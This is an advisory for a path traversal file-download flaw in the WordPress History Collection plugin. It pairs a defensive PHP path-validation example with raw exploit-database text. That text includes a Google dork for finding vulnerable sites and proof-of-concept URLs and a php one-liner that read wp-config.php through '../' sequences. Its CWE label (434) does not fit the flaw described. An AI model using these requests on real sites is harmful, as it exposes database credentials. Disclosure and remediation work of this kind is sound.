Vendor: History Collection
By: Kuroi'SH
CVSS: 8.8 HIGH
Arbitrary File Download
CWE: 434
Product Name: History Collection
Affected Version From: <=1.1.1
Affected Version To: <=1.1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2015

WordPress History Collection <=1.1.1 Arbitrary File Download

The WordPress History Collection plugin contains a file called download.php that does not filter its GET input and then uses that value to force the download of a file. Proof of concept is provided in the text.

Mitigation:

Ensure that user input is properly sanitized and validated before being used to access files.
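
One way to implement the mitigation above, as an added example that is not the plugin's code or its actual patch: canonicalize the requested name with realpath() and serve it only if it stays inside a dedicated download directory. The function name, extension allowlist and directory layout are assumptions; `var` is the parameter named in the advisory.

```php
<?php
// Added example, not the plugin's code. hc_resolve_download() and the
// extension allowlist are hypothetical; 'var' is the advisory's parameter.
const HC_ALLOWED_EXT = ['pdf', 'jpg', 'jpeg', 'png', 'txt'];

// Return the canonical path of $requested when it is a regular file inside
// $baseDir with an allowed extension; otherwise null.
function hc_resolve_download(string $baseDir, string $requested): ?string
{
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;                       // empty input or NUL byte
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                       // download directory missing
    }
    // realpath() collapses "../" and resolves symlinks; false if not found.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Compare against the base plus a trailing separator so a sibling such
    // as "uploads-old" cannot pass as "uploads".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return in_array($ext, HC_ALLOWED_EXT, true) ? $path : null;
}

// In a handler: $path = hc_resolve_download($dir, $_GET['var'] ?? '');
// respond 404 when null, otherwise send basename($path) and readfile($path).

// Self-check on constructed files in a temporary directory.
$root = sys_get_temp_dir() . '/hc_demo_' . getmypid();
mkdir("$root/uploads", 0700, true);
file_put_contents("$root/uploads/report.pdf", 'constructed sample');
file_put_contents("$root/wp-config.php", '<?php // constructed placeholder');

$ok      = hc_resolve_download("$root/uploads", 'report.pdf');
$escaped = hc_resolve_download("$root/uploads", '../wp-config.php');
$badExt  = hc_resolve_download("$root", 'wp-config.php');
if ($ok === null || $escaped !== null || $badExt !== null) {
    throw new RuntimeException('path validation self-check failed');
}
echo "served: $ok\n";
```

The containment test runs on the canonical path, so traversal sequences and symlinks are resolved before the comparison; the extension allowlist is a second layer that keeps .php sources from being served even when a path is inside the permitted directory.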

Exploit-DB raw data:

# Exploit Title: Wordpress History Collection <=1.1.1 Arbitrary File Download
# Google Dork: inurl:plugins/history-collection
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/history-collection/
# Version: <=1.1.1
# Tested on: Linux

I-Description:
Wordpress history collection plugin contains a file called download.php
which is not filtering the GET input, it then uses this get input value to
force the download of a file.
(download.php, line 44):
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
2:Proof of concept:
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
php -r "echo @file_get_contents('http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php');"

Greetz:
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
MuhmadEmad, redsm0ke
By Kuroi'SH